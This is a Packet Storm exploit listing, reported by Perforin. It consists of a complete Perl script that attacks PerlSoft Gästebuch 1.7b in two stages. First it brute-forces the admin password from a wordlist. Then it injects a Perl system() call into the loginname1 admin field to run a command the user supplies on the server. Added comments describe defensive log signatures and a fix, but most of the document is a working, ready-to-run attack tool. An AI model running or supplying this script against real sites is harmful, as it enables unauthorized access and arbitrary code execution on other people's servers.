PerlSoft Gastebuch 1.7b Code Execution

2009-01-30T00:00:00
ID PACKETSTORM:74486
Type packetstorm
Reporter Perforin
Modified 2009-01-30T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
=pod

Type: brute-forcer and remote command execution
Name: PerlSoft GB Pwner
Affected Software: PerlSoft Gästebuch Version: 1.7b
Coder/Bugfounder: Perforin
Visit: DarK-CodeZ.org
Note: RCE is only possible once, do not waste your command!

Review summary of what the script below actually does, in two phases:

Phase 1 walks a wordlist and, for every word, issues one GET to
<url>?sub=vorlage&id=<user>&pw=crypt(<word>, "codec"), comparing the
response body against two verbatim HTML fragments (the login-failure text
and the admin-template heading).

Phase 2 runs only when the fourth argument is "yes": it POSTs the
sub=saveadmindaten form once, with a loginname1 value that ends a quoted
Perl string and appends system("...").  This only works if the application
writes that field unescaped into Perl code it later executes; that is
inferred from the payload shape, not shown here.

Defender's view: the two phases leave distinct server-log signatures — a
burst of sub=vorlage GETs from one client with a varying pw parameter,
followed by a single sub=saveadmindaten POST whose body contains
";system(".  The application-side fix is to validate and escape admin-form
fields before persisting them, and never to write user input into
executable code.

=cut

use strict;
use warnings;
use diagnostics;

use LWP::Simple;
use LWP::Simple::Post qw(post post_xml);

# All state is file-scoped; the script is a single linear pass over the wordlist.
my ($url,$user,$wordlist,$error_counter,$word,$anfrage);
my ($falsch,$richtig,$entry,$rce,$send,$crypted);
my (@response,@rcesend,@array);

# Four positional arguments are required (url, user, wordlist, yes|no); fail() prints usage.
if (@ARGV < 4) { &fail; }

($url,$user,$wordlist) = (@ARGV);

# Verbatim HTML fragments of the target's "access denied" ($falsch) and
# admin-template ($richtig) pages.  They are interpolated into m// below
# without quotemeta, so any regex metacharacter in them would silently change
# the match; with these two strings that has no practical effect.
$falsch = '<tr><td align=center><Font color="000000" FACE="Arial">Nur Administratoren mit gültigen Benutzerdaten haben Zugang in das Admin-Center!</font></td></tr>';
$richtig = '<tr><td bgcolor=#E0E0E0 align=center><B><Font color="000000" FACE="Arial">Gästebuch Vorlage - Einstellen</font></B></td></tr>';

# Minimal argument checks: plain http:// only, and a wordlist with a known extension.
if ($url !~ m/^http:\/\//) { &fail; }
if ($wordlist !~ m/\.(txt|list|dat)$/) { &fail; }

print <<"show";
  
--==[Perforins PerlSoft GB Pwner]==--  
  
[+] Attack: $url  
[+] User: $user  
[+] Wordlist: $wordlist  
  
show
# <WordList> in list context reads the whole file into memory before the loop starts.
open(WordList,"<","$wordlist") || die "No wordlist found!";
foreach $word (<WordList>) {
chomp($word);
# Fixed salt "codec": the guess is hashed client-side and the hash, not the
# cleartext, is sent as pw.  NOTE(review): this presumes the target stores
# crypt() hashes with exactly this salt — not verifiable from this file.
$crypted = crypt($word,"codec");
# One GET per wordlist entry; this is the request pattern visible in the target's access log.
$anfrage = $url.'?sub=vorlage&id='.$user.'&pw='.$crypted;
# get() returns a single scalar (undef on failure), so @array holds at most one
# element and the inner foreach runs at most once.  && binds tighter than ||,
# so a failed fetch prints the message and exits.
@array = get($anfrage) || (print "[-] Cannot connect!\n") && exit;
foreach $entry (@array) {
if ($entry =~ m/$richtig/i) {
print "\n[+] Password cracked: "."$crypted:$word"." !\n\n";
# Fourth argument "yes" enables phase 2; anything else just reports the hit and exits.
if ($ARGV[3] =~ m/yes/i ) {
print <<"RCE";  
[+] Remote Command Execution possible!  
[~] Note: Only _1_ time exploitable, do not waste it!  
[+] Please enter your Command!  
RCE
chomp($rce = <STDIN>);
# These characters are rewritten as ".chr(N)." string concatenations so the
# injected Perl still evaluates to the same text; & and / would otherwise
# break the form body, the rest are presumably filtered by the target
# (inferred — the filter itself is not visible here).
$rce =~ s/>/\"\.chr(62)\.\"/ig;
$rce =~ s/</\"\.chr(60)\.\"/ig;
$rce =~ s/\|/\"\.chr(124)\.\"/ig;
$rce =~ s/&/\"\.chr(38)\.\"/ig;
$rce =~ s/\//\"\.chr(47)\.\"/ig;
$rce =~ s/-/\"\.chr(45)\.\"/ig;
# Form body for sub=saveadmindaten.  loginname1 carries the injection: it
# closes a double-quoted Perl string, appends system("<command>") and reopens
# a string with print "h4x so the remainder of the generated code stays
# syntactically valid.  Defensively, this is the field a WAF or the
# application itself should reject (quote, semicolon and system( in a login name).
$send = 'loginname='.$user.'&loginpw='.$word.'&loginname1='.$user.'";system("'.$rce.'");print "h4x&loginpw1='.$word.'&loginpw2='.$word.'&id='.$user.'&pw='.$crypted.'&sub=saveadmindaten';
@response = post($url, $send);
# A follow-up GET to the base URL presumably makes the application load the
# saved admin data (and thus the injected code); the response body is discarded.
@rcesend = get($url) || (print "[-] Cannot connect!\n") && exit;
print <<"END";  
[+] Command executed!  
  
---====[www.vx.perforin.de.vu]====---  
END
exit;
} else { (print "---====[www.vx.perforin.de.vu]====---\n") and exit; }
} elsif ($entry =~ m/$falsch/i) {
# Only an explicit "access denied" page counts as a tested guess; a response
# matching neither fragment is silently skipped.
$error_counter++;
print "[~] Tested ".$error_counter.": "."$crypted:$word"."\n";
}
}
}
close(WordList);
print "[-] Could not be cracked!\n";
exit;
sub fail {
    # Usage banner: printed whenever the command-line arguments do not pass
    # the checks in the main script; the process then exits.
    my @usage_lines = (
        '+-------------------+  ',
        '| |  ',
        '| PerlSoft GB Pwner |  ',
        '| v0.1 |  ',
        '| |  ',
        '+-------------------+-----[Coded by Perforin]-----------------------------+  ',
        '| |  ',
        '| brute.pl http://opfer.lu/cgi-bin/admincenter.cgi admin wordlist.txt yes |  ',
        '| brute.pl http://opfer.lu/cgi-bin/admincenter.cgi admin wordlist.txt no |  ',
        '| |  ',
        '| yes = Remote Command Execution |  ',
        '| no = No Remote Command Execution |  ',
        '| |  ',
        '+-------------------------[vx.perforin.de.vu]-----------------------------+  ',
    );
    print map { "$_\n" } @usage_lines;
    exit;
}
  